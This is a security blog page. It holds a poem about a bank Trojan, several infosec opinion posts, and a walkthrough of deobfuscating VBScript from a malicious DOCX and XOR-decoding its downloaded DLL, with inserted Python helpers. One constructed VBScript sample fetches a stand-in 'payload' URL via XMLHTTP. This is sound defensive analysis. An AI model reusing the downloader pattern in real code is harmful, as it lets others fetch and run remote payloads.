By Fred Touchette, senior security analyst – AppRiver
‘Twas the night before Christmas, when all through the house
not a creature was stirring, not even a mouse.
But a laptop was open, the network logged on,
and unfortunately for its owner, his security had gone.
Unbeknownst to our user, and all others that care,
this laptop had malware it wanted to share.
It flew over wi-fi, pushed out through the router,
and started its journey, from computer to computer.
The owner worked, for a big corporate bank,
who relied on protection to shield it from pranks.
Had the virus arrived at the enterprise's door,
its journey would be halted, and it would have infected no more.
But unluckily this story, has no happy ending,
for the virus was clever in seeking out glory.
Instead of the front door, it sneaked round the back,
climbed in through a gateway, that had already been hacked!
Now the organisation’s CISO was snug in his home,
blissfully unaware of what had gone on.
While he dreamed of presents, turkey and stuffing,
the virus had unleashed one great big fat Trojan
“Now Mac.Backdoor.iWorm! Now CryptoWall!
Now, GameoverZeus and Stuxnet!
On, Ice IX! On, SpyEye!
On, Torpig and Carberp!
Slide through the ethers!
And infect one and all!
Now cash away! Cash away!
Cash away all!”
While networks lay slumbering, unaware of the risk,
the code was changed slightly, so nothing seemed to be amiss.
But of course, being Christmas, someone would get a surprise
But only if they looked hard, at the damage inside.
No account would be breached,
no coins would be pilfered.
Instead, far more damaging,
credentials were taken.
Sat at home, at his desk, dressed in furs black as ink
The code writer sat, and prepared for a stint.
Lights blinked, alarms sounded, and cogs started whirring,
as over the sky came information, unending.
The credentials arrived first, number one on his list,
then came account details with how much sat in each.
From here what was required, was dexterity, and more
complicated coding to slip through the door.
Back in the bank, not an alarm had he tripped,
so the next stage of his plan he gleefully unleashed.
The Trojan allowed him to travel back in,
to the heart of the building, to plunder within.
The money, he’d steal, from accounts big and small.
He’d hide each transaction, no suspicion would fall.
Once everything was set, with no stone left unturned,
He could slip in and out, as and when, at his will.
Back at his desk programming and streaming,
he worked hard to ensure his code was unrevealing.
He wiped, and he cleaned, he scoured and he scrubbed.
He obscured the Trojan, it was as if he’d worn gloves,
He sat back from his screen, and gave a strange giggle,
And the tunnel he’d created, it dimmed and it dwindled.
But I heard him exclaim, as he spun out of sight,
“Happy Christmas to all, and to all a good night!”
The dsplice
Monday, December 24, 2018
Merry Christmas 2018
Sunday, April 1, 2018
Degrees, Certifications, and Papers, Oh My!
Infosec Certifications, Worth The Paper They Are Printed On?
A few months ago I was reading a lot of posts about the value (or lack thereof) of degrees in infosec. That really got me thinking. What value does education have that comes with a little piece of paper?
To start with, a little of my background. I come from a fairly tried and true infosec path. I went to university and received my Bachelor of Science in Computer Science. I didn't like programming (as was the focus of Comp Sci degrees of the day) so I decided to go the System Admin route. I spent a number of years in this field (including *shudder* management) and by all accounts was quite successful. Eventually though I felt the 'pull to the light' of infosec. I started doing more and more security duties and eventually worked my way into full-time. At that point I studied, and got my CISSP, and eventually moved on to SANS where I obtained a number of certifications including the coveted GSE. Anyone who looks at my profile will note, I have quite an alphabet behind my name. With this, most people would automatically expect me to be on the high road of infosec certification.
But here is the kicker, I am really not. As a person who has done a lot of hiring over his years, I have hired the majority of my best people, without ANY (at least without a LOT) infosec certifications. Ok, I know I am a Gemini, but why the discrepancy? It all goes down to a few things that will become clear further down. For now, let us dive into the types of certifications, and different purposes for getting them.
Types of Paper:
- Comp Sci/General University Degrees
- Infosec Degrees
- Vendor Specific Certifications
- Vendor Neutral Certifications
1. Again, my personal experience is with the first one. In my day (and location), a comp sci degree was all that was available to me. And as a whole, it was worth it. I learned a lot, and not just about computers. I learned HOW to learn. Discovered my own particular learning style and why high school was such a hard time for me. Some of the most important lessons I took from my time in university were how to use logic, how a microprocessor worked, and the design of the Unix operating system. These skills are not directly used in my current job, but the learnings obtained, are the foundation for just about everything I do. Many of my colleagues ask me how I manage to figure out some very complex items, and I am almost always telling them about what I learned in university.
2. Ok, now this one I have no personal knowledge of, so please forgive me if I butcher or say stuff that is totally out of line. Infosec degrees are a relatively new phenomenon. Yes I do realize that many have been around for over a decade, but in my day, they did NOT exist. I have mixed feelings about them. And I think a lot of this 'mixture' has to do with the varying quality I see in programs. In some cases, I see a "Master's" level program that appears to teach the very basics of Cisco firewalls and IDSes, and other "Bachelor" level ones that appear to get into the theoretical side of threat and risk. In one case, I have been told by the dean of one of the Master's degrees, that I would not learn anything from it. So in essence it would be a (highly) expensive piece of paper. Yet I have been turned down from opportunities because I did not have it.
3. Many people have experience with this one. And not all 'vendor specific' training needs to be just product specific. Cisco, Microsoft, {insert security appliance vendor name ad nauseam} often do a very good job at explaining the 'why' part of the equation rather than just the 'what'.
4. Lastly, we come to vendor neutral. Many times vendor neutral certifications are very similar to good quality vendor specific ones, just without relying on one particular vendor. I find they often focus more on the why than the what. This to me is a big benefit, however for many others, can be quite the opposite. Some of this might become clearer later on as well.
Why Certify?
Like there being many different types of certifications, there are many different reasons for certifying. I will talk about the types I have discovered. Many times people are a mixture of more than one as the need may encompass various requirements.
- HR Filter Bypass
- Technical Filter Bypass
- Financial
- External Bragging Rights
- Internal Bragging Rights
1. HR Filter Bypass is relatively straightforward. In many cases, HR and hiring companies have teams of people whose only job is to screen candidates and put forward those who meet the minimum filter. If candidate X does not have N years of experience with technology T, drop 'em. Seems unfair to many of us but this is simply how business works. There may be companies more forward thinking and able to see beyond this, however they are VERY few and far between. A good example of an HR Filter Bypass certificate is the CISSP (sorry ISC2). In my 12 years of having it, I have never learned anything in getting it (save some level-setting on some terminology), and have only ever used it for getting past HR. As far as I am concerned, it is useless for everything else, yet I will keep renewing it until it is no longer needed.
2. Technical Filter Bypass is the next level up. You have gotten past the HR stiffs (sorry my friends in HR), and now have your resume sitting in front of someone that at least knows something about infosec. Likely this will be the hiring manager or team lead. They likely have 20-100 resumes sitting in front of them. And as we humans are naturally lazy, we will want to find the quickest way to go through the list to narrow it down. Examples of this are varied depending on the position. Items like Security+, CISA/CISM, GSEC etc are some that I often see used as this. Doesn't mean they cannot describe a valuable skill or knowledge, but are used to trim down the pile until the hiring manager gets to people they want to at least interview.
3. Financial is quite easy. In some organizations (which I find shrinking as time goes on), certain levels of certifications or degrees come with a financial benefit. This can be a bonus, higher base pay, or even the ability to move upwards through the infosec ladder. I usually find this more in the upper regions of education like an MBA and a Master's in Infosec. Nuff said on this one.
4. External Bragging Rights again is quite easy. This is to satisfy the need to try to show that a person is smart, better than someone else, or a person who just likes to justify why everyone should listen to them. Please note though, this is not always a bad thing. Human beings are competitive creatures by their very nature. We like showing the fact that we have achieved a certain level or milestone. After all, we (usually) put in a lot of effort, time, and money to get there. I will even admit to this one myself. I like others to know what I can do, and yes I do think that sometimes my ego needs to be a lot more humble (something I am actively working towards). This is not a problem unless it becomes the ONLY (or main) reason for certifying. If you only obtain something for the benefit of telling others, you are REALLY in the wrong field. We have a lot of legitimate 'rockstars' in infosec; fakers are quickly called out and shunned (*cough* Simon Smith *cough*).
5. Lastly, Internal Bragging Rights. I know what you are thinking, "What the F**K is he talking about?". I have included this one for a couple of reasons. First, not many people would understand what this is about, and two, I am a 'victim' of it as well (as referenced in my previous posting, ImNotWorthy). I personally suffer from Imposter Syndrome in a huge way. In fact my whole thought process around starting to blog was my attempt to overcome it. I constantly find myself doubting my own skills, knowledge, and even experience. I was even told (with my parents present) by my vice principal that I would not succeed in any academic venue, and should just accept the fact that I would only be good at manual labor. Talk about killing any dreams of a future. So based on this, I found myself wanting to constantly learn new things. I am not happy anywhere I am not learning. But learning is only part of the battle for someone who feels they are just 'faking it'. So I often use certifications to try to prove to myself that I can actually do this. That I ACTUALLY know something. This past fall I even received the GSE (GIAC Security Expert) certification after a long and hard lab. Less than 200 people have EVER been awarded this in the past 13 years of the certification's existence. Yet, even after all of that, I still feel I need to prove to myself, that I am not the 'Imposter'.
Last Thoughts
I know this subject has a lot of different opinions. And in online threads and discussions, has some very passionate and heated feelings. I hope my ramblings might help others see that different ideas about certification are often based on who you are, where you come from in infosec, and where you are trying to go. No one answer is right for anyone else, but can be used to help others decide what is right for them.
Update August 22, 2018
Found this article this morning. Google, Apple and IBM are looking at dropping college degree requirements from their hiring practices. I personally think this is a move in the right direction, as hiring practices should be based on hiring the BEST candidate for a job. No matter what 'stream' they come from!
Saturday, October 14, 2017
Kaspersky, Evil or Not
Kaspersky, Russian Agent or just Russian?
With all the mess that seems to be raging about the validity of Kaspersky AV products, I thought I would pen (yet) another opinion piece.
Latest news around the tube is that Israeli hackers had broken into Kaspersky's infrastructure and found evidence of Russian government actors inside looking for information that could be used for geopolitical interests.
First, a couple of things... AV software, being generally seen as a necessary evil, is installed on practically ALL systems (well if not, it probably should be). Why is this? Simple, due to the ubiquity of malware with all sorts of purposes, it is a significant threat. Most (if not all) cyber attacks either start with, end with, or are comprised entirely of malware. AV is so universal due to that threat.
If you are a home user, that is pretty much where the threat model ends. So what do you do? You go and install the best protections you can afford and effectively work with. Kaspersky has shown in many tests to be highly capable in this regard. It has been shown to have very high coverage, extremely low false positives, low system impact, and fast new signature releases (http://chart.av-comparatives.org/chart1.php).
I personally suggest Kaspersky for this standard use-case. Why? Simple, it works. Is it for everyone? Of course not. Why? Well just read on! :)
Now how about for other use cases? If you are a business? Well again, depends on the threat model you are protecting against. Standard business with a very small amount of intellectual property? Probably similar to a home user. If you have LOTS of very sensitive intellectual property, then different decisions may need to be made. Does this mean no Kaspersky? Well if you are a Russian company, I would hazard a guess you are probably not as worried. If you are a US company, maybe.
This brings us to another point... Russian government actors inside of Kaspersky. Does anyone else remember when the US government was intercepting Cisco shipments to other countries to install backdoors? (https://arstechnica.com/tech-policy/2014/05/photos-of-an-nsa-upgrade-factory-show-cisco-router-getting-implant/) If anyone tries to make believe that other countries do not do similar things given the opportunity, there are lots more examples to be shown. AV companies are all of high interest to hackers. AV is everywhere, and has access to everything. As an occasional pentester, AV is my FAVORITE target. Nothing like turning a protection around on itself.
So this brings us back to, "what do I do?" Well my main suggestion is to consider what you have of value that would be enticing to steal. If you have lots, then perhaps use a reputable AV company with offices and infrastructure belonging to your own country. US? Try using a US company. Russia? Try using a Russian company.
Lastly, the whole point of this is simple. AV software is a required protection mechanism. However it is also a threat vector. Always consider everything when looking at your risks.
Don't give into FUD, for FUD is a path to the dark side!
D
Tuesday, May 16, 2017
WannaCry Reflections
WannaCry Technical
Sorry, you're not going to find loads of technical information here in this post.
Ok, So Non-Technical
Alrighty then. As the above indicated, this article is not going to be going into the technical guts of the (now) infamous worm that wreaked havoc and cancelled so many weekend plans. There have been lots of articles (and a lot of FUD) written about it already. Much of it by people who do not get paid directly to work with malware. A quick Google search will show you more than you can ever handle.
People Involved
I wanted to focus some attention on the people involved in dealing with this nasty little worm. And no, I am not offering biographies on individuals. Rather I wanted to say how impressed I was with the infosec community as a whole. People, from all walks of life, different countries, timezones etc came together to work on the problem.
Even before the worm started spreading, there were individuals who raised the alarm over the vulnerability the worm would go on to exploit. People on Twitter stated that this one would be bad, "our next MS08-067". I doubt that many of them could have even guessed how much damage would be wrought.
It shouldn't be too surprising. A vulnerability within a pervasive protocol, which would allow for remote code execution and give an attacker full SYSTEM level control, would be too tempting a target for anyone with malicious intent.
Added to the mystique was the fact that this flaw was found (and likely utilized) by none other than the NSA, only to be stolen and later released by the ShadowBrokers.
What a perfect storm. Who'd a thunk it?!?! Well as we all know, it didn't take long before someone weaponized it, and added a self-replicating ability.
Throughout the community, people came together to raise the alarm. Then to analyze the malware and give technical information as to its capabilities. Then to even work to help neuter the malware with its famous 'kill switch'. Attribution has been attempted, however I think that effort will go on for a long time to come.
In the meantime, defenders are still working hard to stop the infection, apply patches and help reduce the impact of this worm.
Impact
The impact of the worm will definitely be hard to measure. We have heard lots of people state that they believe it is the most destructive event in infosec. I tend to agree. While I do not have numbers, the ability of the worm to target sensitive files and spread has to give it an edge. Other worms were definitely more 'disruptive', however many of them still failed to give the lasting impact of having all of your valuable data rendered unrecoverable.
The Future
As I have stated before, let no disaster go unused. There will be good to come out of this.
First, the importance of patching and keeping OSes updated will likely not be forgotten easily. Even in hard to patch devices like embedded systems (MRI machines anyone?). At the very least it gives us a data point to show people a quantifiable cost for the risk.
Secondly, our "blue teams'" importance will be cemented within the mindset of C-level executives. Yes we may be a 'cost center', however we will firmly be labeled as an important factor in risk reduction. Again, being able to show, in quantifiable numbers, your value to an organization, is KEY to C-levels understanding.
Thirdly, the importance of working together, worldwide, has been shown. We are much stronger standing together and working collaboratively than we are apart. We can come together and truly have a positive impact on worldwide information security. My hope is, that this realization will empower organizations to open up more, to share information more freely. To give their employees time (and more importantly money) to go and do those things that do not always benefit the company directly, by helping out the world community. We are so connected and inter-dependent on each other that the more we collaborate, the stronger we all become.
A Final
I wanted to express my thanks to several people, but wanted to call one out in particular. @MalwareTechBlog, the individual who (at least at first) accidentally registered the first worm's kill site. He showed what we should strive for. He helped out tremendously, and not just for the kill site. But for his technical analysis of the worm, and even more so for his work coordinating between several global organizations to help protect and help people who were infected. Added to that was the fact that after being given $10K for his excellent work by @Hacker0x01 he stated it would be split between charities and for education stuff for others. A true class act! A beer on me anytime we meet dude!
Monday, May 8, 2017
World Class or Local Class
Again, apologies for another opinion piece. Again this one has bugged me for a long time.
One of the trends I have noticed for the past 4 or 5 years has been recruiters calling me up, stating they are looking for 'world class' talent. Senior skills and people which are hard to find. Of course they are hard to find. There are not as many rockstars in any field, as there are simple rocks. Yet, companies continue to insist they want this talent LOCAL to them.
This makes no sense to me. If you are looking for diamonds, you do not strip mine a whole area determined to find them.... You go where THEY are! You spend the time and effort to go to where they exist, and work your magic.
Skilled talent, especially at senior levels, is not easy to find, and sometimes impossible to find in your area. Yet when you find someone, you tell them they have to move. This is wrong on so many levels. If you want 'world class' talent, they need to be able to work from anywhere in the 'world'. Please do not bother me with claims stating how cool your company is, or how you only hire the best, when you refuse to allow them to work from wherever they are. This is key.
If you do not have a remote work ability, don't waste my time. Professionals are professionals no matter where they are. They work hard and have no need for someone to keep looking over their shoulder to ensure they are doing what they are paid for. Professionals are passionate. They will be no matter where they are in relation to their boss, director, peers, customers etc.
Another Ramble
I have been in the infosec field a fairly long time. In addition, I have put myself out there through postings, email, social media, etc. So I think it is safe to say I have a fairly large target on me in terms of recruiters and people looking for 'skilled' talent.
Final Point
If you are not allowing your professionals to work from anywhere in the world, you are NOT looking for world class talent. Please stop bothering me and others with your HR shit speaking! I am good at what I do, VERY good. If you want me, take me. If not, GTFO, I'm busy....
Saturday, May 6, 2017
Of Snakeoil and Infosec
To start, apologies for posting another opinion piece. This topic has been bugging me for a while, and along with a post by another security blogger last week, I felt it needed to be said.
To all infosec vendors, hardware, software, and services....
Please check your grand claims and marketing bullshit at the door. There is no need for it. If your product/service is good, we in the community will know it. We will talk about it. We will BUY it... However, if you use terms like 'unhackable', 'unbreakable', '100% secure'.... We will ALSO talk about it, but not in your favor. Nor will we 'buy' it. Shit claims like this are why you (and especially your marketing division) are the laughing stock of the rest of the world.
First
NOTHING is unbreakable (Sorry Oracle, you of all companies should know this is BULLSHIT). If you claim that your product is 100% secure, EXPECT me to test it. I will, and I will find its flaws. And of even greater threat, I WILL publish findings.
The recent article by Scott Helme about nomx (https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/) was the catalyst for me to write this. Too many times vendors make grand claims to sell blinkenlights. Products or services to 'solve' the security problem. If you make the claim, have the balls to back it up, or shut up. You are directly responsible for your customers' current security issues. They trust you, believe you, buy into you. And what do you do? You sell them snake oil. Magical cures which in the end, do more harm than good.
Second
So that brings me to a second point. If a researcher, or anyone, goes through the work to point out the flaws in your 'widget', man up and respond with respect. These guys often have more knowledge and have done more work to secure your products than your whole security team. Responding with threats of litigation, defamation against their skills or character, will not only NOT win you friends, but will actively turn the community against you. The best defense is not always a good offensive. It just proves you are an offensive company that should be avoided.
Scott's article is not the only example of such actions being taken. Infosec history is LITTERED with examples (https://www.wired.com/2013/04/ciphercloud-stackexchange/ was a personal favorite). Even I myself have been accused of false claims against a company when I exposed a company's claims of 'best of breed' encryption to be rubbish.
Thoughts of a Conclusion
This got me thinking. Why would a company fight so hard against the community that has conclusively shown their product or service is flawed. And it hit me....
If you are an honest infosec vendor, you know it's best to work with the community, not against it. There are thousands of people who would be willing to put forth hard work to help improve security, no matter where it is. You know it will be worth the effort because the effort is worthwhile.
If you are a snakeoil salesman, a researcher pointing out flaws is threatening you with extinction. So I can see why you would fight so hard. Just know, there are no perfect secrets, all truth comes out, and everyone will get what they truly deserve in the end. Stop before you start, you are not smarter than the rest of the world, we WILL figure you out!
Monday, April 24, 2017
More Malicious Docs, Oh My!
Introduction
Ok, I know: malicious documents, specifically .DOC, again. So how is this one different? Well, we will get to that in a bit. I wrote this posting as more of an introduction to Visual Basic script deobfuscation and hope others might find it useful/interesting.
Initial Detections
It all started with many users reporting suspicious emails. These emails were a little different from the usual "Open this email and enable macros to view the content".
First, these emails contained a .DOCX rather than the older .DOC or a .DOCM. Ok, that is odd.
Secondly, they were encrypted. The email they were attached to, gave instructions on how to open the email with the password.
Initial Analysis
So the first thing to do is see what VirusTotal and Hybrid-Analysis have on this encrypted document. Let's see....
Not starting so good....
Maybe Hybrid has more....
Ok. So nothing much from any of the usual online sources.... To double-check, let's try some of our command-line tools.
So, it is a valid OLE document, however has no macros to speak of. One issue I noticed, is that OLEID states that the file is not encrypted and not a Word document. I will follow up on this in the near future.
Decrypting DOCX
So let's see about getting something useful outta this... It was quite easy. I could have used MS Word, however to be a bit safer, let's use LibreOffice....
First, we are presented with this
Ok, once the (correct) password is entered, we finally see the true document....
Interesting. Seems the document has 3 embedded objects. We will work on those in a bit. First, let's see what our tools say about the document NOW!
Ok, now that looks A LOT more malicious. So far so good I would say. What more can we tell though? Those embedded OLE objects look very suspicious. Let's check them out...
OLEVBA states there is no macro. Ok, so not using macros... Let's see what other tools we have will tell us....
Ok, OLEDUMP tells us a bit more. Three objects embedded. And they all seem to have the same sizes. Let's extract them and run a cryptographic hash to see if they are indeed the same....
So looks like standard Visual Basic Script, although obfuscated. Ok, so now here is where the fun begins....
Visual Basic Deobfuscation
First thing I decided to do, was load the script up in Notepad++ and turn on syntax highlighting
I find syntax highlighting helps a lot. So the first thing I like to do is start cleaning up the silly cAmElCaSe I see in the document (a simple find/replace works nicely), and put some extra whitespace between all of the functions and subroutines...
Ok, that is a bit better. First thing I notice is the use of mathematical functions. Most likely they are used to represent simple numbers. Let's go and take care of all of those....
The KyVrqqM function being called here looks a lot like some sort of decryption routine. Will look at this in a bit.
Another thing I noticed while doing the original deobfuscation, is that there appears to be a bunch of junk instructions.
This pattern repeats (with different variables and data) over and over and over again. When examining the variables, they are only used within these three lines. Which means they are essentially a "Do Nothing" collection of instructions. Let's delete them and see what that does to the size of our script...
WOW, doing just that, the file has gone from 464 lines, to just 170. This also revealed some other 'complication' techniques, like using a function to call a single function. We can simplify that further...
Let's see where OgkD is called, and convert it into a simple Mid itself (there are a few different functions that do this, including ones for Asc and Chr). Let's do them all and see what happens...
Down to 158 lines. Fewer gains, but still, let's continue! Next I look for variables that are set but never used (a simple find or count should indicate it is safe to delete). Then I look for variables that are set to a static piece of data and then used elsewhere (non-mutable). Those can be substituted with no effect.
Down to 101 lines. That is a lot of junk. Probably more there that could be removed, but so far, looks like a job well done. Code is much more readable and it is becoming clearer this script is meant to download something, write it to a file and do something with it.
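The three passes just described (folding arithmetic back into plain numbers, substituting variables that are set once to a static value, and deleting variables that nothing else reads) can be automated. The Python below is an added example, not code from the post: it runs those passes over a small constructed VBScript snippet. The Decode routine, the variable names and the hxxp URL in the sample are made up for illustration, and the script is deliberately limited to single-line statements (no multi-name Dim, comments or line continuations).

```python
import re

# Constructed sample in the style the post describes: a variable touched only
# by its own lines, numbers hidden as arithmetic, and literals assigned once
# then read elsewhere.  Decode() is hypothetical and the URL is a stand-in.
SAMPLE = """\
Dim xQw
xQw = 3 + 4
xQw = xQw * 2
Dim sHost
sHost = "hxxp://example.invalid/payload"
nKey = 100 + 15
Set oHttp = CreateObject("MSXML2.XMLHTTP")
oHttp.Open "GET", sHost, False
sData = Decode(oHttp.ResponseText, nKey, (3*4-2), 2*5)
zJunk = "unused"
zJunk = zJunk & Chr(104)
"""

ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=', re.I)
DIM_RE = re.compile(r'^\s*Dim\s+([A-Za-z_]\w*)\s*$', re.I)
LITERAL_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*("(?:[^"]|"")*"|\d+)\s*$')
IDENT_RE = re.compile(r'[A-Za-z_]\w*')
ARITH_RE = re.compile(r'(?<![\w.])\d+(?:\s*[-+*]\s*\d+)+(?![\w.])')  # digits and + - * only
PAREN_NUM_RE = re.compile(r'(?<![\w)])\(\s*(\d+)\s*\)')
# Side-effect-free names; an assignment that uses only these may be deleted.
PURE_NAMES = {'chr', 'asc', 'mid', 'len', 'abs', 'cstr', 'cint', 'clng', 'lcase',
              'ucase', 'and', 'or', 'not', 'xor', 'mod', 'true', 'false'}

def map_outside_strings(line, fn):
    """Apply fn to the parts of a line that are not inside "..." literals."""
    parts = line.split('"')
    for i in range(0, len(parts), 2):
        parts[i] = fn(parts[i])
    return '"'.join(parts)

def identifiers(line):
    """Lower-cased identifiers on a line, ignoring string literal contents."""
    found = []
    map_outside_strings(line, lambda s: found.extend(IDENT_RE.findall(s.lower())) or s)
    return found

def fold_arithmetic(line):
    """Replace literal arithmetic such as (3*4-2) with its value, 10."""
    def value(m):
        try:  # ARITH_RE admits only digits, whitespace and + - *, so eval is safe here
            return str(eval(m.group(0)))
        except SyntaxError:  # e.g. a leading zero; leave the text as it was
            return m.group(0)
    return map_outside_strings(
        line, lambda s: PAREN_NUM_RE.sub(r'\1', ARITH_RE.sub(value, s)))

def _is_pure(line, target):
    rhs = line.split('=', 1)[1]
    return all(n == target or n in PURE_NAMES for n in identifiers(rhs))

def remove_dead_assignments(lines):
    """Drop Dim lines and side-effect-free assignments whose variable no other
    statement reads (the post's 'do nothing' blocks), repeating until stable."""
    while True:
        owner = {}  # line index -> variable the line declares or assigns
        for i, line in enumerate(lines):
            dm, am = DIM_RE.match(line), ASSIGN_RE.match(line)
            if dm:
                owner[i] = dm.group(1).lower()
            elif am and _is_pure(line, am.group(1).lower()):
                owner[i] = am.group(1).lower()
        reads = {n for i, line in enumerate(lines)
                 for n in identifiers(line) if owner.get(i) != n}
        kept = [line for i, line in enumerate(lines)
                if i not in owner or owner[i] in reads]
        if len(kept) == len(lines):
            return lines
        lines = kept

def inline_constants(lines):
    """Substitute variables assigned exactly once, to a literal, into their
    uses; the assignment then becomes dead for remove_dead_assignments."""
    assigned = {}
    for i, line in enumerate(lines):
        m = ASSIGN_RE.match(line)
        if m:
            assigned.setdefault(m.group(1).lower(), []).append(i)
    out = list(lines)
    for name, idxs in assigned.items():
        m = LITERAL_RE.match(lines[idxs[0]]) if len(idxs) == 1 else None
        if m:
            value, pat = m.group(2), re.compile(r'\b%s\b' % re.escape(name), re.I)
            for j, line in enumerate(out):
                if j != idxs[0] and not DIM_RE.match(line):
                    out[j] = map_outside_strings(line, lambda s: pat.sub(lambda _: value, s))
    return out

def deobfuscate(source):
    """Fold numbers, inline constants, then strip what became dead."""
    lines = [fold_arithmetic(l) for l in source.splitlines()]
    return remove_dead_assignments(inline_constants(lines))

if __name__ == '__main__':
    print('\n'.join(deobfuscate(SAMPLE)))
```

Run on the sample, the eleven lines collapse to the three that actually do something: the CreateObject call, the Open with the URL inlined, and the Decode call with 115, 10 and 10 as plain numbers. Assignments whose right-hand side calls anything outside PURE_NAMES are never deleted, which is what keeps the download and decode lines in place even though sData is never read afterwards.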
One item that keeps coming up, over and over again, is this:
I am pretty sure this is some sort of decryption given the fields "encodedtext", "key", offset1, offset2. Let's copy these to another file along with the function....
Two extra functions had to be added in. Looks like a mathematical one, and a possible XOR routine. Let's run it and see what it gives...
Now that is interesting. We have a couple of http strings, along with some commands designed to run DLLs....
Downloaded Payload
Now let's try to download those files and see what they give us...
Hmmm, the first link gives us a binary file. The 'file' command only lists it as 'data'. Not very useful. What about the second file? Well that was time wasted. Unable to find a copy of the file at all. So let's start on that first one.
The file shows up in VirusTotal interestingly enough. Still not a true virus, but enough people know about it to show us something.
Something smells familiar though. My hunch is it has been xor'ed. I see some xor like function in the Visual Basic script, but I am feeling a bit lazy. Back to one of Didier's programs, XORSEARCH.
Ok, now that was easy. Let's see if we can find 73 anywhere in our script. No dice.... Oh, but wait: converting from hex to decimal gives us 115. Let's look that up.... BINGO!
Looking at that last line, I noticed that the YS function appears to be the same one that looked like an XOR function. Guess I was right: XORed, given the ASCII representation of Xb808, with 115 being the decimal key.
So, let's XOR this file and see what pops out on the other end. For this I will use Didier's tools again (xorsearch -p -s xoredfile.bin).
So this finally gives us our DLL! So let's look at what VT has to say about it....
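For readers without xorsearch to hand, here is the same single-byte key search in Python (an added example, not the post's code and not Didier's tool): each candidate key is applied to the strings a PE file normally carries and the result is searched for in the raw blob, so a 2-byte "MZ" hit on its own scores far less than the full DOS stub text. The sample blob is constructed inside the script, XORed with 0x73 to mirror the key found above; the real download is not reproduced here.

```python
# Added example: recover a single-byte XOR key the way xorsearch does, by
# looking for strings a PE file is expected to contain.
MARKERS = (b"MZ", b"This program cannot be run in DOS mode", b"PE\x00\x00")

def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key (0-255)."""
    return bytes(b ^ key for b in data)

def rank_keys(blob, markers=MARKERS):
    """Score each key by the total length of markers found under it.  The
    marker is XORed with the key and searched in the raw blob, so the blob is
    never decoded 256 times.  Returns [(key, score), ...], best first."""
    scores = {}
    for key in range(256):
        for marker in markers:
            if blob.find(xor_bytes(marker, key)) != -1:
                scores[key] = scores.get(key, 0) + len(marker)
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))

def recover(blob):
    """Return (key, decoded) for the best-scoring key, or (None, None)
    when no marker is found under any key."""
    ranked = rank_keys(blob)
    if not ranked:
        return None, None
    key = ranked[0][0]
    return key, xor_bytes(blob, key)

# Constructed stand-in for the downloaded file: the start of a PE image (DOS
# header, DOS stub text, PE signature) plus filler, XORed with 0x73, which is
# the same key as decimal 115 in the post.
_PLAIN = (b"MZ\x90\x00" + b"\x00" * 60
          + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 20
          + b"PE\x00\x00" + bytes(range(256)))
SAMPLE_BLOB = xor_bytes(_PLAIN, 0x73)

if __name__ == "__main__":
    key, decoded = recover(SAMPLE_BLOB)
    print("key: 0x%02x (%d), decoded starts with %r" % (key, key, decoded[:2]))
```

Ranking by matched marker length rather than by first hit matters on real samples: random two-byte collisions for "MZ" turn up under several keys, while the DOS stub sentence only ever lines up under the right one. Key 0 is reported like any other, so a file that was never encoded simply ranks as key 0.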
So definitely a naughty little program. I will end it here as my DLL reversing is not yet up to where I want to post publicly about it :) Hopefully later... Hope you enjoyed!
Shout Outs
Here I want to put in a few links and shout outs to places and tools that I have used and that helped me out through my work here.
Edit 1
I was asked on a mailing list of mine to put in some more text. Well this might not be what he wanted, but thought I would upload a little ugly sed sled (you will see why) to help with the camel case and break things apart a little....
# Reads the script on stdin and writes the cleaned version to stdout (GNU sed).
# Each substitution is case-insensitive (I) and global (g) on plain substrings,
# not whole words: 'end' also rewrites the middle of 'send', which the later
# 'send' rule then repairs.  That ordering dependence is why it is ugly.
sed -e 's/function/Function/Ig' \
    -e 's/set/Set/Ig' \
    -e 's/end/End/Ig' \
    -e 's/if/If/Ig' \
    -e 's/do/Do/Ig' \
    -e 's/and/And/Ig' \
    -e 's/write/Write/Ig' \
    -e 's/read/Read/Ig' \
    -e 's/responsebody/ResponseBody/Ig' \
    -e 's/then/Then/Ig' \
    -e 's/else/Else/Ig' \
    -e 's/dim/Dim/Ig' \
    -e 's/sub/Sub/Ig' \
    -e 's/create/Create/Ig' \
    -e 's/object/Object/Ig' \
    -e 's/textfile/TextFile/Ig' \
    -e 's/environment/Environment/Ig' \
    -e 's/get/Get/Ig' \
    -e 's/asc/Asc/Ig' \
    -e 's/chr/Chr/Ig' \
    -e 's/mid/Mid/Ig' \
    -e 's/error/Error/Ig' \
    -e 's/true/True/Ig' \
    -e 's/status/Status/Ig' \
    -e 's/resume/Resume/Ig' \
    -e 's/send/Send/Ig' \
    -e 's/open/Open/Ig' \
    -e 's/next/Next/Ig' \
    -e 's/for/For/Ig' \
    -e 's/ to / To /Ig' \
    -e 's/type/Type/Ig' \
    -e 's/savetofile/SaveToFile/Ig' \
    -e 's/close/Close/Ig' \
    -e 's/loop/Loop/Ig' \
    -e 's/err.number/Err.Number/Ig' \
    -e 's/until/Until/Ig' \
    -e 's/End Function/End Function\n/g' \
    -e 's/End Sub/End Sub\n/g'
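A word-boundary version of that sed chain, in Python (added example, not from the post): keywords are matched as whole words and only outside string literals, so 'end' no longer touches the middle of 'send' and nothing inside a quoted string is rewritten, and the blank line after each End Function / End Sub is kept. The keyword list is the one the sed chain covers plus a few VBScript basics; extend it as needed.

```python
import re

# Canonical spellings.  Matching is case-insensitive, on whole words only, and
# string literals are left alone.
KEYWORDS = ["Function", "Sub", "End", "If", "Then", "Else", "Dim", "Set", "Do",
            "Loop", "Until", "For", "To", "Next", "And", "Or", "Not", "True",
            "False", "On", "Error", "Resume", "CreateObject", "Mid", "Asc", "Chr",
            "Open", "Send", "Status", "ResponseBody", "SaveToFile", "Close",
            "Write", "Read", "Type", "Environment", "Err", "Number"]
_CANON = {k.lower(): k for k in KEYWORDS}
_KW_RE = re.compile(r'\b(' + '|'.join(map(re.escape, KEYWORDS)) + r')\b', re.I)

def normalise_case(line):
    """Fix keyword casing outside "..." string literals (even-indexed parts)."""
    parts = line.split('"')
    for i in range(0, len(parts), 2):
        parts[i] = _KW_RE.sub(lambda m: _CANON[m.group(1).lower()], parts[i])
    return '"'.join(parts)

def tidy(source):
    """Normalise every line and add a blank line after each End Function/Sub."""
    out = []
    for line in source.splitlines():
        line = normalise_case(line)
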